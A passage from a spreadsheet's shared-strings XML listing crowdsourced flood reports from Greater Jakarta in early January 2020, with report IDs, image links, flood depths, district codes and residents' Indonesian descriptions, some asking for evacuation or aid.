    <t>https://images.petabencana.id/e1412995-85d9-42ab-9555-c4c650ad5568.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 122, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Perumahan pinang griya permai jl. Merpati putih 1 sekitar pukul 15.00</t>
  </si>
  <si>
    <t>Pinang</t>
  </si>
  <si>
    <t>3391bffd-e7ac-475c-9978-639db5a05efe</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3391bffd-e7ac-475c-9978-639db5a05efe.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 72 }</t>
  </si>
  <si>
    <t>Banjir di pejuang jaya sejak tgl 31 Des sore</t>
  </si>
  <si>
    <t>cc61d8fc-fc48-447d-ad78-aebc34be5001</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cc61d8fc-fc48-447d-ad78-aebc34be5001.jpg</t>
  </si>
  <si>
    <t>Jalan banjir akibat tanggul situ Sasak jebol, arus lalu lintas ditutup dan dialihkan 23.13</t>
  </si>
  <si>
    <t>Bambu Apus</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347092</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/01/347092-15778948171602720357.mov-05.jpg</t>
  </si>
  <si>
    <t>Kembali Diguyur Hujan, Matraman Siaga Banjir Kiriman</t>
  </si>
  <si>
    <t>Banjir kembali terjadi di Matraman, Jakarta timur, banjir kiriman ditambah hujan deras membuat rumah warga tergenang hampir selutut.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347087</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/01/347087-1577889938981496550.mov-03.jpg</t>
  </si>
  <si>
    <t>Siaga Banjir Kiriman, Warga Bidara Cina Berkemas Malam Ini</t>
  </si>
  <si>
    <t>Kemas - kemas, banjir kiriman sudah sampai di Bidara Cina, atas luapan Ciliwung.</t>
  </si>
  <si>
    <t>85832f49-9d93-4378-945c-1d65c770666c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/85832f49-9d93-4378-945c-1d65c770666c.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 78 }</t>
  </si>
  <si>
    <t>Banjir 70ncm di jl. Mh thamrin cikokol di sepan jasa marga sampai rs  awal bross..kendaraan macet total dari jam 3 sore sampai sekarang</t>
  </si>
  <si>
    <t>Kelapa Indah</t>
  </si>
  <si>
    <t>95b3e50c-4142-4632-bbdb-1f982b71b84e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/95b3e50c-4142-4632-bbdb-1f982b71b84e.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "1046", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>8c115e90-b224-4e1d-9b94-0eb3112e04c2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8c115e90-b224-4e1d-9b94-0eb3112e04c2.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1194", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir karena luapan kali Gang Menara Jatipadang Jaksel"</t>
  </si>
  <si>
    <t>Jati Padang</t>
  </si>
  <si>
    <t>Pasar Minggu</t>
  </si>
  <si>
    <t>9784adfc-e388-4dcc-84fa-f964ddc255bc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9784adfc-e388-4dcc-84fa-f964ddc255bc.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 125 }</t>
  </si>
  <si>
    <t>Banjir dari subuh sampai jam 2 siang baru surut. Banjir sedalam dada hingga masuk rumah sampai sepaha</t>
  </si>
  <si>
    <t>Pasirsari</t>
  </si>
  <si>
    <t>Cikarang Selatan</t>
  </si>
  <si>
    <t>ed11ccfe-49f9-433b-aa9b-f99e770d7a3e</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 48, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Kavling buaran indah banjir</t>
  </si>
  <si>
    <t>Harapan Mulya</t>
  </si>
  <si>
    <t>6cc371b9-7f53-4e75-bd37-56c953dc146e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6cc371b9-7f53-4e75-bd37-56c953dc146e.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 48, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1254", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pejaten Barat</t>
  </si>
  <si>
    <t>d7e37da6-a3c8-4a9a-8fac-aa1368b919bb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d7e37da6-a3c8-4a9a-8fac-aa1368b919bb.jpg</t>
  </si>
  <si>
    <t>Saya ingin melaporkan bencana banjir yang terjadi di villa nusa indah 2 . Jl wijaya kusuma 1. Bojong kulur ,kab bogor.Tolong bantuan nya.kar</t>
  </si>
  <si>
    <t>c9ce46f6-01b3-4257-ae15-41012e54cfe1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c9ce46f6-01b3-4257-ae15-41012e54cfe1.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1115", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jl. Muhi pd pinang banjir. Akses terputus</t>
  </si>
  <si>
    <t>Pondok Pinang</t>
  </si>
  <si>
    <t>Kebayoran Lama</t>
  </si>
  <si>
    <t>29854694-c8ff-41af-b104-96a7ee6e8c23</t>
  </si>
  <si>
    <t>https://images.petabencana.id/29854694-c8ff-41af-b104-96a7ee6e8c23.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 24 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "255", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir luapan dr sungai hutan kota</t>
  </si>
  <si>
    <t>Srengseng</t>
  </si>
  <si>
    <t>31ee190b-1ca7-4b10-b31b-d77a3043bbc0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/31ee190b-1ca7-4b10-b31b-d77a3043bbc0.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 45 }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "702", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sebelah kali</t>
  </si>
  <si>
    <t>Kartini</t>
  </si>
  <si>
    <t>82369780-7817-4aa0-b723-77820d2832e0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/82369780-7817-4aa0-b723-77820d2832e0.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 47 }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "721", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Arah pasar baru</t>
  </si>
  <si>
    <t>Karang Anyar</t>
  </si>
  <si>
    <t>d93ffba1-4f30-4a88-aac3-50f8581e374b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d93ffba1-4f30-4a88-aac3-50f8581e374b.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 99, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "151", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir dari pagi tahun baru, tanggal 1 januari 2020 dan makin tinggi di pagi ini, tanggal 2 januari 2020, akses kemana-mana tidak bisa.</t>
  </si>
  <si>
    <t>3ebbca13-fb46-4847-b272-ac792e73f4bd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3ebbca13-fb46-4847-b272-ac792e73f4bd.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 122 }</t>
  </si>
  <si>
    <t>sudah 2 hari airnya tidak menurun sama sekali</t>
  </si>
  <si>
    <t>593c9f7c-34de-4617-a4ce-0bc5bff6f8cb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/593c9f7c-34de-4617-a4ce-0bc5bff6f8cb.jpg</t>
  </si>
  <si>
    <t>Diluar rumah saya (Jl. Bintaro Rosalia II Bumi Bintaro Permai) banjirnya setinggi 50 cm dan didalam rumah air nya setinggi semata kaki.</t>
  </si>
  <si>
    <t>Pondok Betung</t>
  </si>
  <si>
    <t>df39acf7-aca7-4d8d-88a2-4709336d125c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/df39acf7-aca7-4d8d-88a2-4709336d125c.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 56, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2377", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Depan Puskesmas Kecamatan Penjaringan jalan teluk gong raya, mulai banjir dari kalijodo ke arah kapuk sepaha orang dewasa</t>
  </si>
  <si>
    <t>Pejagalan</t>
  </si>
  <si>
    <t>Penjaringan</t>
  </si>
  <si>
    <t>Jakarta Utara</t>
  </si>
  <si>
    <t>919e5762-bd3d-4332-92a2-6538a6b7fbf8</t>
  </si>
  <si>
    <t>{ "points": 4, "flood_depth": 20, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1885", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Genangan di kolong Tol Cawang. Arah dalkot bisa dilalui, arah tanjung priok closed</t>
  </si>
  <si>
    <t>Kebon Pala</t>
  </si>
  <si>
    <t>835e94e4-cf96-4c8b-9b65-1ddccb377d11</t>
  </si>
  <si>
    <t>https://images.petabencana.id/835e94e4-cf96-4c8b-9b65-1ddccb377d11.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 48 }</t>
  </si>
  <si>
    <t>Jembatan ke arah danau srengseng</t>
  </si>
  <si>
    <t>a5e86620-2d2a-4e49-b539-594baafa803d</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1300", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir setinggi 50cm melanda daerah ini. Kamera rusak.</t>
  </si>
  <si>
    <t>8e6ceb98-c84d-441f-802d-6acf13334558</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8e6ceb98-c84d-441f-802d-6acf13334558.jpg</t>
  </si>
  <si>
    <t>{ "points": -2, "flood_depth": 45, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "208", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir depan ranch market</t>
  </si>
  <si>
    <t>22346b53-8bb0-4e02-8ed1-d147825cf632</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2672", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Bundaran Aston</t>
  </si>
  <si>
    <t>Cengkareng Timur</t>
  </si>
  <si>
    <t>81555f64-0dcc-4acb-b948-25af17efdc68</t>
  </si>
  <si>
    <t>https://images.petabencana.id/81555f64-0dcc-4acb-b948-25af17efdc68.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 90, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Lokasi : perumahan kota baru cimuning kelurahan cimuning kecamatan mustikajaya. Terjadi sejak 01 januari 2020 pk.03.00 hingga skrg."</t>
  </si>
  <si>
    <t>Cimuning</t>
  </si>
  <si>
    <t>Mustikajaya</t>
  </si>
  <si>
    <t>6358129f-dc4e-42be-afa0-eb17a8aa7850</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6358129f-dc4e-42be-afa0-eb17a8aa7850.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "222", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir setinggi 50cm sejak 1 Januari 2020</t>
  </si>
  <si>
    <t>891553a0-df15-4025-a162-cdf6bb9198d4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/891553a0-df15-4025-a162-cdf6bb9198d4.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2578", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Taman Ratu, Greenville, Sunrise Garden sudah 2 hari belom surut !!</t>
  </si>
  <si>
    <t>3f5c2655-dc38-49d1-b69c-73e045b1f2ac</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3f5c2655-dc38-49d1-b69c-73e045b1f2ac.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 60, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "477", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Tanjung duren utara 8 gang 6 masih tergenang air setinggi lebih kurang 60 cm</t>
  </si>
  <si>
    <t>Cempaka Putih Timur</t>
  </si>
  <si>
    <t>Cempaka Putih</t>
  </si>
  <si>
    <t>a76b1f47-d104-4d79-8c54-ce000d02e47c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a76b1f47-d104-4d79-8c54-ce000d02e47c.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 33 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "1987", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>kampung Pulo Harapan indah Masih banjir... Sebagian Belum bisa Di lalui kendaraan Roda dua"</t>
  </si>
  <si>
    <t>Cengkareng Barat</t>
  </si>
  <si>
    <t>5fec21f8-7203-4e7b-bbd1-f161712a0119</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5fec21f8-7203-4e7b-bbd1-f161712a0119.jpg</t>
  </si>
  <si>
    <t>{ "points": 8, "flood_depth": 150, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Tolong selamatkan keluarga saya, udah 24 jam gak ada bantuan evakuasi, ada lansia, banjir belum juga surut</t>
  </si>
  <si>
    <t>Karangsatria</t>
  </si>
  <si>
    <t>Tambun Utara</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347158</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/15779433851893402354.jpg</t>
  </si>
  <si>
    <t>Banjir 50cm di Perumahan Taman Permata Buana, Jakarta Barat</t>
  </si>
  <si>
    <t>Banjir ketinggian 50cm sejak Rabu, 1 Januari 2020 di Perumahan Taman Permata Buana, Jakarta Barat,</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347161</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/15779443431114747727.jpg</t>
  </si>
  <si>
    <t>{ "points": -1 }</t>
  </si>
  <si>
    <t>Banjir Surut, Kini Jalan Kemang Pratama Bekasi Penuh Lumpur</t>
  </si>
  <si>
    <t>Air Banjir Surut, Kini Jalan Kemang Pratama Bekasi Dipenuhi Lumpur kali. Hati-hati berkendara jika melintas dijalan tersebut karena licin.</t>
  </si>
  <si>
    <t>Bintara Jaya</t>
  </si>
  <si>
    <t>4f2e3273-b6dc-4d95-a17a-17568b13bd24</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 91, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2613", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sepinggang &amp; listrik padam</t>
  </si>
  <si>
    <t>Kapuk Muara</t>
  </si>
  <si>
    <t>fa3eb17a-6c58-4004-9a3c-f1cbf92f06f9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fa3eb17a-6c58-4004-9a3c-f1cbf92f06f9.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2393", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan Kacang polong 2, Bojong. Sudah banjir dari tanggal 1 kemarin</t>
  </si>
  <si>
    <t>Rawa Buaya</t>
  </si>
  <si>
    <t>8c0669c9-b812-4f93-b9a2-774de6fff669</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8c0669c9-b812-4f93-b9a2-774de6fff669.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 39, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "1060", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>sekeliling apartment Green Palm Residence, Duri Kosambi, Cengkareng - JakBar</t>
  </si>
  <si>
    <t>79ff8e92-241e-46eb-8da0-7b33cf19717e</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 80 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "27", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di daerah pangeran tubagus angke dari rumah duka jelambar sampai ke BCA duta as kira2 setinggi paha orang dewasa</t>
  </si>
  <si>
    <t>c4ad808e-665b-43e3-8d6d-d224590ad12e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c4ad808e-665b-43e3-8d6d-d224590ad12e.jpg</t>
  </si>
  <si>
    <t>Banjir di taman ratu indah blok A1 masih belum turun sudah 2 hari. Penduduk terisolir</t>
  </si>
  <si>
    <t>7ec4c1f2-d9d3-4084-8fb3-7f8878bcddab</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7ec4c1f2-d9d3-4084-8fb3-7f8878bcddab.jpg</t>
  </si>
  <si>
    <t>{ "points": 5, "flood_depth": 63, "report_type": "flood" }</t>
  </si>
  <si>
    <t>di jembatan duri kosambi,</t>
  </si>
  <si>
    <t>d5405318-57b4-4a8c-b91f-db0bf6201fc7</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 41, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Depan rumah sudah surut sekarang. Tapi masih stgh betis org dewasa. Hibrida V</t>
  </si>
  <si>
    <t>a67ac68d-4c03-4fcc-9418-9ea9d8376611</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a67ac68d-4c03-4fcc-9418-9ea9d8376611.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 143, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2387", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>wilayah cengkareng jakarta barat daerah klingkit jalan flamboyan banjir sudah satu meter lebih butuh bantuan makanan  mohon bantuan segera"</t>
  </si>
  <si>
    <t>a533b0a9-a05e-4ced-a048-aa48cc9f4725</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 104, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "129", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sejak 1/1/2020, belum surut hingga sekarang, yang ada malah naik</t>
  </si>
  <si>
    <t>6e47257f-abb8-4903-967e-354c274d6d88</t>
  </si>
  <si>
    <t>Di daerah MKG</t>
  </si>
  <si>
    <t>c954e9de-8d5e-4d63-91eb-7dc18bc4ca9f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c954e9de-8d5e-4d63-91eb-7dc18bc4ca9f.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 149, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Air semakin tinggi, beberapa keluarga menantikan perahu karet untuk evakuasi</t>
  </si>
  <si>
    <t>6dfa6d4e-9513-438e-a6d5-be4917eafaab</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 89, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Saya tidak bisa fotokan karena semalam saya keluar. Namun infor warga sekitar sejak tadi air semakin meninggi dan tidak surut</t>
  </si>
  <si>
    <t>80420d23-2797-4f46-9465-f4d34c68929a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/80420d23-2797-4f46-9465-f4d34c68929a.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 9 }</t>
  </si>
  <si>
    <t>30476db5-6732-41f0-94e2-009af3cfc84b</t>
  </si>
  <si>
    <t>Taruma kencana sepinggang di jalanan. Pompa air ke kali katanya rusak semua. Sampai sekarang ga surut2</t>
  </si>
  <si>
    <t>e3a03580-92e0-410a-87f2-06f53ac993ec</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e3a03580-92e0-410a-87f2-06f53ac993ec.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 90 }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2410", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kondisi kawasan Teluk Gong dekat apartemen Teluk Intan, pukul 07.30 tanggal 2 Jan 2020</t>
  </si>
  <si>
    <t>6b803538-425a-4e7e-bea1-10d5b0619ff3</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 75, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "146", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir dari depan rcti sampai perumahan wisma, dikarenakan air kali pesanggrahan meluap</t>
  </si>
  <si>
    <t>0fef4eaf-55a3-4300-92f5-406051ae3870</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0fef4eaf-55a3-4300-92f5-406051ae3870.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "199", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan Safir VIII Blok C7</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347174</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/157794996293592987.jpg</t>
  </si>
  <si>
    <t>Genangan 10-15cm Masih Terlihat di Jalan KH Kasyim Ashari</t>
  </si>
  <si>
    <t>Air setinggi 10-15cm masih menggenangi jalan kh hasyim ashari tangerang arah cipondoh maupun sebaliknya. Laju kendaraan pun tersendat. Ditanbah dengan kontur jalan yang berlubang sangat membahayakan bagi pengguna motor</t>
  </si>
  <si>
    <t>Buaran Indah</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347176</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/15779509501031626333.jpg</t>
  </si>
  <si>
    <t>Jalan KH Hasyim Ashari Dekat Situ Cipondoh Banjir</t>
  </si>
  <si>
    <t>Jalan kh hasyim ashari dekat situ cipondoh banjir. Tinggi air diperkirakan 10-20cm untuk yang mengarah ke cipondoh, sementara cipondoh arah tangerang ditutup karena air lebih tinggi dan hanya bisa dilewati kendaraan besar seperti bus dan truk. Jalur kiri</t>
  </si>
  <si>
    <t>Kenanga</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347173</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/02/347173-15779491491552056400.mp4-03.jpg</t>
  </si>
  <si>
    <t>Banjir Belum Surut di Jalan Bungur Belakang PN Jakarta Pusat</t>
  </si>
  <si>
    <t>Jalan Bungur tepatnya di belakang Pengadilan Jakarta Pusat dan mall Golden Truly masih banjir belum bisa di lewati kendaraan tinggi mencapai 30-40 cm</t>
  </si>
  <si>
    <t>161b4869-795c-4c8a-a301-ed03a25e0b5c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2589", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir di sekitar kali. akses keluar masuk kompleks terblokir banjir dan harus menggunakan perahu karet</t>
  </si>
  <si>
    <t>Semanan</t>
  </si>
  <si>
    <t>Kali Deres</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347169</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/02/1577947070174659179.jpg</t>
  </si>
  <si>
    <t>Sedih! Usaha Orang ini Terancam Bangkrut Gara-gara Banjir</t>
  </si>
  <si>
    <t>Sedih banget! Salah satu tempat usaha yang terendam banjir pada saat kemarin mulai beberes namun beberapa peralatan yang mendukung usaha seperti komputer menjadi rusak. Lokasi di Jl. Prof Dr Hamka - Larangan (Gg Caplin), Tangerang.</t>
  </si>
  <si>
    <t>Larangan Utara</t>
  </si>
  <si>
    <t>Larangan</t>
  </si>
  <si>
    <t>fbc46a31-3b71-4784-89f5-64a9e70b055f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fbc46a31-3b71-4784-89f5-64a9e70b055f.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 48, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Jalanan kendaraan agak melambat sepanjang pom bensin graha raya, fortune, dan belum semua surut..</t>
  </si>
  <si>
    <t>Paku Jaya</t>
  </si>
  <si>
    <t>Serpong Utara</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347177</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/02/347177-15779518501668248679.mov-03.jpg</t>
  </si>
  <si>
    <t>{ "points": 2 }</t>
  </si>
  <si>
    <t>Ciliwung Mulai Surut, Tumpukan Sampah Mulai Terlihat</t>
  </si>
  <si>
    <t>Ketinggian air di Sungai Ciliwung mulai surut, sampah-sampah mulai terlihat mengambang di aluran sungai tersebut. Lalu, siapa yang salah? Malu ketika menyalahkan pemerintah namun diri sendiri masih sering buang sampah sembarangan. Yang buang sampah semba</t>
  </si>
  <si>
    <t>e55db060-a650-444a-8689-561d6d0949a0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e55db060-a650-444a-8689-561d6d0949a0.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 95, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir Pertigaan jalan Lundu sekitar 90cm</t>
  </si>
  <si>
    <t>608c240d-fd9c-49a7-9412-d14056405d10</t>
  </si>
  <si>
    <t>https://images.petabencana.id/608c240d-fd9c-49a7-9412-d14056405d10.jpg</t>
  </si>
  <si>
    <t>Difoto 2 Januari 2020 jam 12 siang. Jam 3 sore ini masih belum surut</t>
  </si>
  <si>
    <t>d3f7721a-c629-4808-852d-5e811f6755ab</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d3f7721a-c629-4808-852d-5e811f6755ab.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 70, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2315", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Bojong indah perumahan carina sayang sampai persada sayang</t>
  </si>
  <si>
    <t>d73cf950-13d7-44ba-a84d-252c00ffad21</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d73cf950-13d7-44ba-a84d-252c00ffad21.jpg</t>
  </si>
  <si>
    <t>{ "points": 5, "flood_depth": 100, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "34", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di tanjung duren utara 9 setinggi 1 meter. Mohon bantuan agar bisa dilakukan penyedotan air.</t>
  </si>
  <si>
    <t>Tanjung Duren Utara</t>
  </si>
  <si>
    <t>7ed557d5-4e45-41ed-935f-c69ca9f31624</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 58, "report_type": "flood" }</t>
  </si>
  <si>
    <t>50 cm</t>
  </si>
  <si>
    <t>2ea42d87-0a76-4635-a5ca-95a7ef44a79f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2ea42d87-0a76-4635-a5ca-95a7ef44a79f.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 133, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Nambojaya</t>
  </si>
  <si>
    <t>Karawaci</t>
  </si>
  <si>
    <t>2e2f61be-d9ed-4f70-a2e5-30e91b95d639</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2e2f61be-d9ed-4f70-a2e5-30e91b95d639.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 53, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di atas lutut org dewasa,mobil motor tdk bisa lewat.internet signal on off,signal wifi mncplay off,indihome on,akses perahu bisa</t>
  </si>
  <si>
    <t>3f1a4f90-be11-4e91-a1dc-f1c41f6762ec</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3f1a4f90-be11-4e91-a1dc-f1c41f6762ec.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 94, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Kondisi di dalam rumah tadi pagi, siang ini sudah sedengkul dan di luar rumah sudah mencapai pinggang.</t>
  </si>
  <si>
    <t>f580f594-143d-4fec-a1c9-1d17a4ebde73</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f580f594-143d-4fec-a1c9-1d17a4ebde73.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "15", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Dr masjid terus sampai belakang. Gang kanan kiri juga banjir, kecuali jelambar baru I yg mendingan karena sudah ditinggikan</t>
  </si>
  <si>
    <t>9671fa54-732d-403a-a7e0-de7b4eabf6bb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9671fa54-732d-403a-a7e0-de7b4eabf6bb.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 60, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir kisaran 60cm, daerah lain sudah mulai surut, tapi disini belum, tolong bantu agar bisa segera di sedot dengan pompa air.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/347182</t>
  </si>
  <si>
